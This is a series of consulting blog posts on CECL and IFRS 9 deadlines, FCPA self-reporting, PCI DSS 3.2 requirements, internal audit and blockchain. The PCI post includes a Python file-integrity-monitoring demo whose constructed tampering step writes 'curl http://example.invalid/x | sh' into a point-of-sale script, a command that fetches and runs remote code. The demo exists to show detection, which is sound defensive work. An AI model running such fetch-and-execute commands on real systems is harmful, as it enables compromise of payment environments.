CECL/IFRS 9 Update: New Credit Impairment Model Deadlines and Implementation Considerations



By Charlie Anderson, Managing Director, Model Risk Management,
and Charles Soranno, Managing Director, Financial Reporting Remediation & Compliance

As Protiviti reported back in May, the Financial Accounting Standards Board (FASB) and the International Accounting Standards Board (IASB) have been looking for lessons in the global banking crisis of 2007-08 and have come up with new forward-looking predictive models for financial institutions to use when estimating how much to reserve against potential loan losses.

The FASB’s CECL model becomes effective in 2020 for SEC filers, and the IASB’s International Financial Reporting Standard 9 (IFRS 9) is effective for annual periods beginning on or after Jan. 1, 2018, unless early adoption is elected. Protiviti strongly recommends immediate action because of the extensive changes in data-collection practices, systems configuration, loan classification and risk modeling the new models require.

The new impairment model from FASB, which applies to banks, savings and loans, credit unions and non-bank lenders in the United States, as well as global institutions traded on U.S. exchanges, is called Current Expected Credit Loss (CECL). Final guidance (Accounting Standards Update 2016-13) was issued on June 16, 2016. The IASB’s new impairment model, which applies to institutions reporting under IFRS outside the United States, is part of IFRS 9.

For a detailed analysis of these new methodologies, see Protiviti’s Point of View briefing, Impact of the New Current Expected Credit Loss (CECL) Methodology, and the companion paper, IFRS 9 Impairment — Practical Implications. Both models are discussed, along with implementation considerations, in our Aug. 17 webinar, “Impact and Challenges of CECL and IFRS,” available in our online webinar archive.

The methodologies are similar in that both replace reserves based on incurred, historical losses with forward-looking expected-loss models that incorporate past, present and forecast data, including market intelligence and macroeconomic trends. The primary difference is that IFRS 9 uses a three-stage classification: 12-month expected losses are recognized for performing loans (stage 1), and lifetime expected losses only once credit risk has increased significantly (stage 2) or the loan is credit-impaired (stage 3). CECL has no staging and recognizes lifetime expected losses from the day a loan is originated or purchased.

The basics of these two methodologies have been covered in our previous blog post, so we don’t want to rehash them here, but we do want to share some implementation considerations we discussed in the webinar. Successful implementation is going to require an enterprisewide effort with input from most, if not all, departments. Some of the bigger details to be worked out include:

  • Gathering required data assets/history to feed the new model requirements
  • Creating underlying models and IT infrastructure for determining the required reserves
  • Identifying required business process updates, along with resources required to validate the updated reserving methodologies

Specific deadlines for CECL include:

  • SEC filers: fiscal years beginning after Dec. 15, 2019, including interim periods within those years
  • Public business entities that are not SEC filers: fiscal years beginning after Dec. 15, 2020, including interim periods within those years
  • All other entities, including nonprofit organizations: fiscal years beginning after Dec. 15, 2020, and interim periods within fiscal years beginning after Dec. 15, 2021

IFRS 9 is effective for all entities for annual periods beginning on or after Jan. 1, 2018, but firms may choose to adopt the standard early.

Protiviti is already working closely with clients to help them prepare, and we encourage all financial institutions to act without delay. We fully expect practical issues and questions to be raised during the implementation and auditing phases, and further evolution of the guidance is quite likely. Financial service organizations need to start assessing the implications of these approaches sooner rather than later.

Thank you to Protiviti Associate Director Benjamin Shiu for his contributions to our CECL and IFRS 9 materials as well as our webinar.

FCPA and the DoJ: Compliance Beats Defiance

By Scott Moritz, Managing Director, Protiviti Forensic

I’ve written before about how the Department of Justice (DoJ) is stepping up efforts to root out and prosecute corporate fraud, particularly bribery and corruption, under the Foreign Corrupt Practices Act (FCPA). One of the biggest complaints I’ve heard from clients and their counsel is that there are varying degrees of credit and reduced fines and disgorgements granted for companies that self-report and that some have found it difficult to calculate the potential benefits of self-reporting.

The DoJ recognizes this perceived disparity and in April launched a one-year pilot program to encourage corporate compliance: companies that voluntarily self-report FCPA violations, fully cooperate with investigators and remediate (including measures to prevent future misconduct) may qualify for up to a 50 percent reduction off the bottom of the applicable Sentencing Guidelines fine range, and in some cases a declination.

In May, Protiviti held its first FCPA and Anti-Kleptocracy Conference, bringing corporate executives and compliance officers together with government corruption investigators in a neutral environment to share ideas and build constructive alliances. It was a lively exchange. I came away with a lot to think about, and I’ll be sharing some of it here on The Protiviti View, beginning with this post on compliance considerations.

Last year, the Department of Justice signaled an increased focus on corporate crime and international corruption with the FBI’s creation, in March, of three squads dedicated to FCPA investigations, and a subsequent memo from Deputy Attorney General Sally Quillian Yates to DoJ attorneys on the importance of holding individuals accountable in corporate prosecutions.

At the same time, to encourage corporate cooperation and transparency, the DoJ began touting incentives, such as reduced penalties, for executives and corporations that demonstrate good faith in the investigation and a proactive stance toward prevention going forward. The recently announced pilot program is a good example of that. With so much to gain from cooperation and so much to lose, compliance has never been more important.

One of the speakers at the FCPA conference was Laura Perkins, an assistant chief in the DoJ’s FCPA unit, where she supervises and prosecutes FCPA cases against individuals and companies. According to Perkins, one of the first things the DoJ looks at, upon responding to an incident, is the quality of a company’s compliance program and controls. They initiate discussions with the company and quickly begin to form opinions about how transparent and cooperative the organization is going to be in the investigation.

The DoJ will ask about compliance programs prior to the incident, efforts to find root causes, discipline of responsible parties and actions taken post-incident to prevent future corruption.

Perkins mentioned that one of the more significant changes within the DoJ is its retention of a compliance counsel – someone who attends compliance meetings at target companies to get an inside picture, as well as helps some of the trial attorneys who don’t have as much exposure to compliance and controls and what they should look like.

When it comes to discipline, the DoJ isn’t as concerned with outright dismissal as it is with ensuring that the punishment fits the crime.  With minor infractions, training is often sufficient. The important thing here, from a compliance perspective, is being able to document and demonstrate the controls and practices in place to ensure FCPA compliance, the mechanisms in place to detect violations, and the rigor and sincerity of corrective efforts to prevent future violations.

From my perspective here at Protiviti, I would add that the best compliance programs are those based on real-world examples. There is much that can be learned from the mistakes of others and from the open exchange of ideas – which was one of the primary motivations for our FCPA conference.

Finally, I would note that a strong anti-corruption culture discourages corrupt parties from targeting your organization in the first place. Here’s what such a culture looks like, according to the DoJ:

  • Sufficient compliance-dedicated resources;
  • Competent compliance personnel who are sufficiently compensated and promoted;
  • Compliance function independence and reporting structure;
  • Compliance program crafted from an effective risk assessment; and
  • Compliance program audited regularly to assess its effectiveness.

In future posts, I’ll examine the DoJ’s pilot program in greater detail, discuss ways to avoid FCPA successor liability through acquisitions and contracts with third parties, and address some other topics discussed during our FCPA and Anti-Kleptocracy Conference.

PCI DSS 3.2 – What You Need to Know

By Jeff Sanchez, Managing Director, IT Security and Privacy,
and Scott Laliberte, Managing Director, IT Consulting

We’ve been getting a lot of inquiries from clients on the new payment card industry (PCI) compliance standard issued by the PCI Security Standards Council in April. The new data security standards (DSS) release, dubbed PCI DSS Version 3.2, contains some major changes from the previous version.

The changes are explained pretty clearly in our May 9 Flash Report, but we recently had the opportunity for a more interactive discussion and to answer questions via a webinar we held on August 18. In a future post, we will follow up with some of the questions we did not have a chance to address. Here, we’d like to focus on the upcoming changes.

Some of the upcoming changes may require a significant effort to achieve. They affect every entity that stores, processes or transmits cardholder data for credit, debit or prepaid cards, and could leave many organizations out of compliance for an extended period if work does not start early.

The biggest changes affecting all organizations (effective Feb. 1, 2018) are as follows:

  • Multifactor authentication (MFA) will be required for all non-console administrative access into the cardholder data environment (CDE), including administrative access from inside the corporate network (Requirement 8.3.1). That means that, in addition to a password, an administrator must present at least one additional, independent factor, such as a one-time code from a hardware or software token, a smart card or a biometric. Version 3.1 already required two-factor authentication for users, administrators and third parties accessing the CDE remotely from outside the network; 3.2 extends the control to internal administrative access and renames it “multifactor” to make clear that two is the minimum, not the limit. Note: Companies currently using multifactor authentication as a compensating control for technical noncompliance will no longer be able to list it as a compensating control once it becomes a requirement in its own right.
  • File integrity monitoring (FIM), or an equivalent change-detection solution, will be required on all in-scope systems, which includes all systems connected to, not just those within, the CDE. The solution must alert on unauthorized modification of critical system files, configuration files and content files, and comparisons must run at least weekly (Requirement 11.5). Many organizations do not currently have FIM technology on point-of-sale terminals or administrative workstations.
  • Change management is an area of increasing concern for the Security Standards Council. PCI DSS 3.2 requires organizations to document all changes to in-scope systems, identify every control that might be affected by each change, and prove after implementation that those controls were retested and that corrective action was taken, where needed, to restore an effective control environment (Requirement 6.4.6).

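The FIM requirement above is easiest to understand as a concrete mechanism. The following Python script is an added illustration, not Protiviti’s or the PCI Security Standards Council’s code: it records a baseline of SHA-256 digests, permission bits and sizes for every file under a directory, then reports files that were added, removed or changed, including a permission change with no content change. The directory layout, file names and the tampering performed in demo() are constructed for the example.

```python
"""Minimal file integrity monitor (added example): baseline a directory tree,
then report what was added, removed or modified since the baseline."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path

TRACKED_ATTRS = ("sha256", "mode", "size")


def _fingerprint(path: Path) -> dict:
    """Content digest plus the permission bits and size of one regular file."""
    st = path.lstat()
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"sha256": digest.hexdigest(),
            "mode": stat.S_IMODE(st.st_mode),
            "size": st.st_size}


def snapshot(root) -> dict:
    """Map each regular file (path relative to root) to its fingerprint."""
    root = Path(root)
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink():
                continue  # a symlink's target is what matters; kept out of this demo
            result[p.relative_to(root).as_posix()] = _fingerprint(p)
    return result


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots. 'modified' maps path -> {attr: (old, new)}."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = {}
    for rel in sorted(set(baseline) & set(current)):
        changed = {attr: (baseline[rel][attr], current[rel][attr])
                   for attr in TRACKED_ATTRS
                   if baseline[rel][attr] != current[rel][attr]}
        if changed:
            modified[rel] = changed
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Build a constructed mini point-of-sale tree, baseline it, tamper, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "pos.sh").write_text("#!/bin/sh\necho processing card\n")
        (root / "bin" / "pos.sh").chmod(0o755)
        (root / "config.ini").write_text("[db]\nhost=cde-db\n")
        (root / "old.log").write_text("rotate me\n")
        baseline = snapshot(root)

        # Constructed tampering: script body replaced, config made world-writable,
        # a log removed, and an unexpected binary dropped in.
        (root / "bin" / "pos.sh").write_text("#!/bin/sh\ncurl http://example.invalid/x | sh\n")
        (root / "config.ini").chmod(0o666)
        (root / "old.log").unlink()
        (root / "dropper.so").write_bytes(b"\x7fELF")
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, items in demo().items():
        print(kind, items)
```

Two operational points matter more than the hashing. First, the baseline must live signed and off-host: an attacker with administrative rights on the monitored system can otherwise rewrite the baseline along with the files, which is also why FIM belongs on administrative workstations, not only on servers. Second, weekly comparison is the floor in 11.5; on point-of-sale systems and anything reachable from the internet, continuous or near-continuous checking with alerts routed to the security operations team is what actually catches a tampered payment script before the next batch of cards is processed.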
Service providers face even greater scrutiny under the new standards.

  • Security controls monitoring must be able to detect failures of critical security control systems such as firewalls, FIM, anti-malware and logging (Requirement 10.8), and the provider must have supporting processes for responding to a failure that cover restoring the control, documenting the outage, determining root cause and addressing any security issues that arose while the control was down.
  • Executive management responsibility is another hot-button issue. PCI DSS 3.2 requires service providers to assign a member of executive management overall accountability for protecting cardholder data and maintaining PCI DSS compliance (Requirement 12.4.1). This executive oversees the program and signs the attestation of compliance.
  • Operational reviews must be conducted quarterly (Requirement 12.11). Service providers must review, at least quarterly, that personnel are following operational processes, including, but not limited to, daily log reviews, firewall rule set reviews, application of configuration standards to new systems, response to security alerts and change management procedures.
  • Penetration testing of segmentation controls must be performed at least every six months and after any change to segmentation controls (Requirement 11.3.4.1), versus annually in 3.1. The test should be scoped so that it confirms the CDE remains isolated even if a system outside the CDE is fully compromised, administrative rights included: the tester works from the out-of-scope networks and attempts to reach CDE systems and services.
  • Service providers are also now required to maintain, and provide to assessors, a documented description of the cryptographic architecture used in the CDE (Requirement 3.5.1). This must cover all algorithms, protocols and keys used to protect cardholder data, including key strength and expiration date, how each key is used, and an inventory of any hardware security modules and other secure cryptographic devices used for key management.

PCI version 3.2 is available for use now and becomes the only valid standard when version 3.1 is retired on Oct. 31, 2016. However, many of the new requirements in 3.2 do not become effective until Feb. 1, 2018. As we said in the webinar, we strongly recommend that organizations work with a Qualified Security Assessor now to ensure compliance and avoid unpleasant surprises under deadline pressure.

Global CAEs Seeing Regulatory Convergence

By Frederick Magliozzi, Managing Director, Internal Audit and Financial Advisory



At The Institute of Internal Auditors International Conference in New York this July, I had the privilege of moderating a panel of CAEs on global audit issues, emerging risks and challenges in the financial services industry.

We had a large international group, including hundreds of CAEs, who were eager to hear from our panelists representing some of the world’s largest financial institutions. Among the panelists were Mark Carawan, CAE of Citi; Naohiro Mouri, Chief Internal Auditor of AIG Japan Holdings; Nicola Rimmer, General Manager Audit at ANZ Bank; and Stephan Schenk, Executive Vice-President and Chief Auditor at TD Bank.

Panelists began with a discussion of the evolving risk landscape. As you might imagine, fraud, reputation and cybersecurity topped the risk list, with cloud risk rising in response to growing demand for mobile banking and big data analytics.

Although those risks are not necessarily new, the conversation focused on ways the internal audit function is evolving to stay ahead of the risk curve. Panelists emphasized the importance of continuous monitoring and the need for audit automation, digitization and more sophisticated tools to support the ascendancy of internal audit into a more strategic role as risk advisor across all lines of defense.

The need for the implementation of new audit technology and ongoing training in how to make the most of these new and sophisticated tools was a recurring theme, echoed in a subsequent question about the future of the internal audit function. Our panelists all emphasized the critical need for internal auditors to be able to anticipate and identify potentially disruptive risks and work closely with first-line managers to bring value-added mitigation recommendations to the table.

For me, the biggest takeaway from the discussion was the consensus among both panelists and CAEs in attendance, that regulators around the globe are beginning to align their efforts particularly in areas such as anti-money-laundering (AML) and the Bank Secrecy Act (BSA).

There seems to be a growing acknowledgement that money knows no borders. Regulators from various geographies around the globe are in much closer communication than ever before. They communicate regularly and they are creating a lot of pressure for financial institutions to make sure they are addressing risks — not only strategic risks, but local regulatory risks. And they are interested in the credentials of the people assigned to watch over these risks, to ensure technical competency.

From an internal audit perspective, this future state of increased regulatory cooperation and scrutiny demands robust risk assessments and risk training, to ensure that stakeholders understand all of the significant risks institutions face. Current regulatory hot buttons include: vendor risk management, AML/BSA, and cybersecurity to name a few.

In closing, I’d emphasize again that when it comes to internal audit, the tendency is toward unification – this includes ability to see the big picture, connect the dots, articulate interdependencies and collaborate. Regulators increasingly practice the same. For a more in-depth analysis of global regulation, I’d recommend our recently published white paper, The Challenges of Running a Global AML Program. Your thoughts and comments are appreciated, as always.

Introducing Compliance Insights: Protiviti’s Monthly Roundup of News for Financial Services Firms

By Steven Stachowicz, Managing Director, Risk and Compliance



With global banking regulation consistently ranking as a top concern for financial service industry executives and directors, Protiviti has launched Compliance Insights, a monthly advisory newsletter designed to provide financial services industry (FSI) executives with timely news on issues that are relevant now.

Although primarily focused on banking compliance matters related to consumer protection, privacy, anti-money laundering/anti-terrorist financing, and sanctions, this short newsletter also includes topics applicable to other types of financial institutions, including those in capital markets and emerging financial technology (“fintech”).

The information we choose for our monthly briefing is not intended to be a complete picture of the FSI compliance landscape, but to provide clear and concise summaries on key topics we consider of interest to the industry.  We’re not going to cover everything; rather, each month we’ll highlight a handful of issues, tapping our subject-matter experts for analyses of the latest changes in rules and guidance.

Our inaugural issue, launched in July, led with a couple of updates on global payment systems.  In the wake of cyberattacks on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) payments network, which facilitates cross-border interbank transfers, both SWIFT and the Federal Financial Institutions Examination Council (FFIEC) issued reminders to institutions of the need to manage risks associated with interbank electronic transactions. We also shared new guidance from the Wolfsberg Group of International Financial Institutions, an association of 13 global banks with a common goal of developing effective anti-money laundering (AML) standards. The guidance is related to financial institutions’ use of certain SWIFT services.

Other topics included:

  • Proposed rules from the SEC limiting the use of derivative investments by mutual funds;
  • The long-anticipated proposal from the Consumer Financial Protection Bureau (CFPB) on rules governing payday, vehicle title, and other short-term, small-dollar loans; and
  • The possibility of fintech firms obtaining limited-purpose national bank charters, enabling them to operate under uniform federal regulation and supervision.

Our August issue, released last week, provides updates on another CFPB proposal, this one focused on third-party debt collection practices, plus several other topics we consider relevant:

  • A joint regulatory update of Community Reinvestment Act (CRA) Q&As
  • Increased regulatory scrutiny of potential money laundering at card clubs, casino-like gambling establishments offering exclusively card games
  • A ruling by a Miami judge in an anti-money laundering case that calls into question whether bitcoins are “money”
  • Upcoming changes to the Military Lending Act (MLA), which extends additional consumer lending protections to active-duty military personnel and their dependents

We hope you’ll find this resource useful – please let us know if you do or if you have any suggestions or suggested topics. It is part of our ongoing effort to help financial service institutions face the future with confidence.

You can subscribe to Compliance Insights or send us your feedback here.

Blockchain Unchained: Bitcoin Was Just the Beginning

By Ed Page, Managing Director, IT Consulting



These days, it seems that everyone in the financial services industry is talking about distributed consensus ledger (DCL) technology, commonly known as blockchain. The real-time transaction and settlement technology is viewed by some as the breakthrough that’s going to revolutionize electronic payments systems, and by others as the technological grenade that’s going to rip a hole in the world of banking systems as we know it. The truth is, nobody knows how things will turn out with any degree of certainty.

In my opinion, blockchain is potentially one of the most disruptive business technologies to emerge in the digital age, replacing the traditional bookkeeping system of single private ledgers kept in siloed databases and updated in daily batch settlements with a shared public ledger whose entries are grouped into blocks, each cryptographically linked to the one before it and validated by network consensus in near real time, enabling far faster settlement. Transactions are said to be “immutable” because each block carries a hash of the previous block and the network confirms every block, so no single participant can alter a recorded transaction without the change being detected.

In essence, blockchain serves the same function as the current system of clearinghouses and transaction networks that handle most electronic payments and money transfers, including ATM transactions, correspondent banking, credit card purchases and electronic funds transfers. And that’s just one application. Other uses range from secure document transfer and trading of stocks and bonds, to cybersecurity and internal audit.

As you might imagine with something so fundamentally different from what came before it, expert opinions on the benefits, risks and applications are all over the map and often contradictory. The technology itself fosters such contradictions.

For example, while blockchain transactions are considered to be extremely transparent, the pseudonymity of the parties behind them has raised anti-money laundering (AML) and Bank Secrecy Act (BSA) concerns. To use an analogy, the game itself is transparent, but the players are not. And despite the widespread (and accurate) belief that blockchain transactions are secure, hackers recently raided a cryptocurrency exchange and made off with bitcoin worth millions of dollars.

I bring up the exchange attack to illustrate that while blockchain does protect the integrity of the ledger, cryptocurrency networks remain vulnerable at the endpoints: the exchanges, wallet services and other businesses that hold customers’ private keys and data. Whoever holds a private key can spend the funds it controls, and a transfer signed with a stolen key is, from the ledger’s point of view, a perfectly valid transaction that the network will confirm and never reverse.

With closed or permission-based blockchains being viewed increasingly as the future in banking, such obstacles will surely be overcome, but it is important to recognize that we are in a “Wild West” period where hackers and fraudsters are trying as hard to beat the system as others are trying to build it.

Once the “frontier” aspect of blockchain wears out and it begins to find its place into the mainstream of banking technology, financial institutions will need to take other, equally important issues into consideration. Here are a few of the wrinkles that will need to be ironed out:

  • Legacy environment — The old ways may not be elegant, or what everybody wants to use, but they are so embedded in the financial services ecosystem that it will take time and effort to change. Overcoming that inertia and figuring out how to integrate old and new in a 24/7/365 transactional environment is going to be a challenge. Regardless of the time it takes, the writing is on the wall for legacy systems.
  • Vested interests — As a technology that eliminates intermediaries, blockchain has the potential to disrupt the powerful and established institutions that own, and profit from, the movement of money among financial institutions. New business models will inevitably emerge.
  • Regulation — Although transactions are transparent, the ability to track money movement in this environment is still undeveloped. Anti-money laundering (AML) is expensive for banks, and the people who launder money tend to spread their activities across multiple institutions, making tracing those activities in their entirety difficult. Blockchain has the potential to shift regulatory focus and burden away from individual institutions and to the exchange network itself. Businesses are already forming to address that need.

Although it is too early for anyone to have all the answers, financial service executives and internal auditors need to become conversant in blockchain to avoid being blindsided by this rapidly evolving disruptor. For a good primer on blockchain, I’d recommend Volume 3, Issue 2 of Protiviti’s PreView series on emerging risks. We’re going to stay on top of this topic for you. Stay tuned!

Strategic Risks: How Can CAEs Up Their Game?

The latest Common Body of Knowledge (CBOK) survey of internal audit stakeholders reports 7 out of 10 stakeholders want audit leaders to focus on strategic risks, as well as operational, compliance and financial risks, during an audit.

The message is loud and clear. Board members and senior executives are saying they wish to look to the internal audit function for insights that will help them stay ahead of the curve on managing strategic risks — a responsibility that requires collaborations across all lines of defense.

The last thing we, as internal auditors, ever want to hear when something goes wrong is: “Where was internal audit?” But how can CAEs up their game to ensure that this doesn’t happen, particularly when there is increased interest in strategic disruption risk? I recently had the pleasure of addressing this topic joined by an outstanding CAE – Chuck Windeknecht, Vice President of the Internal Audit Department at Atlas Air Worldwide, at The IIA International Conference in New York.

A progressive CAE establishes relevance with the board of directors by understanding the organization’s business objectives, strategy and culture, and identifying risks that could impede the successful execution and achievement of the organization’s strategy and objectives. This baseline understanding positions the organization and the internal audit function to constantly scan the horizon and sift through the noise so the audit committee and executive team can be given strategically relevant insights – something they don’t already know.

To do so, CAEs must be alert, informed, and able to quickly discern the vital signs of change. Success is not a matter of luck, but of preparation that leads to doing four things really well:

  1. Understand the critical assumptions underlying the business model. From an internal audit perspective, this is important to be able to adopt a contrarian view, as well as constantly be on the lookout for changes that could disrupt and threaten the company’s strategic plans and business model. CAEs must be able to access and understand opposing points of view within and outside the organization. But they need a context – and that context would be the organization’s strategic assumptions. That’s not to say auditors shouldn’t remain focused on important operational, compliance and reporting issues. The key is to leverage all available technology and tools to allow themselves more time to think strategically.
  2. Help the organization apply scenario analysis capabilities to evaluate potential situations. As the third line of defense, internal audit is one of the organization’s key components of a comprehensive risk management organization. Accordingly, if internal audit could help identify an event or combination of events that could invalidate one or more of the critical assumptions on a timely basis, it would contribute value to the organization’s leadership. While it is universally accepted that risk assessments must be refreshed periodically, the internal auditor’s line of sight is directed to timely recognition of emerging and changing risks.
  3. Ensure the organization’s intelligence gathering activities are aligned with the key indicators evidencing that scenarios of greatest concern are either developing or have occurred. It is one thing to know what can derail the strategy. It is another to align intelligence gathering with factors that signal when such events or circumstances are occurring or have occurred. Competitive intelligence creates enterprisewide transparency by seeking out forward-looking nontraditional information and data that may offer decision makers a contrarian view and early warning signs. Internal audit is well suited to assist the organization’s efforts with analyzing its early alert capabilities to more effectively mitigate the impact of disruptive developments. The understanding of strategic assumptions and an effective contrarian viewpoint enable this analysis.
  4. Help distill and de-mystify timely information about assumptions, scenario analyses and intelligence gathered. Reporting insights to decision makers is what it’s all about – setting us apart and establishing our relevance. To this end, it is critical to establish direct access to customer and marketplace feedback and provide insights that are unfiltered by the suppression occurring when information passes through traditional information siloes. Internal audit should place an emphasis on improving risk information across the organization. That can lead to better information for decision-making used in the business.

To echo my colleague Brian Christensen, these are exciting times for the internal audit profession. Our strategic advice and insight are being sought like never before. We’ve come a long way to get here. Now that all eyes are on us, it is critically important to perform with skill, intelligence and dedication, to prove that our leaders’ faith and trust in us are well-placed.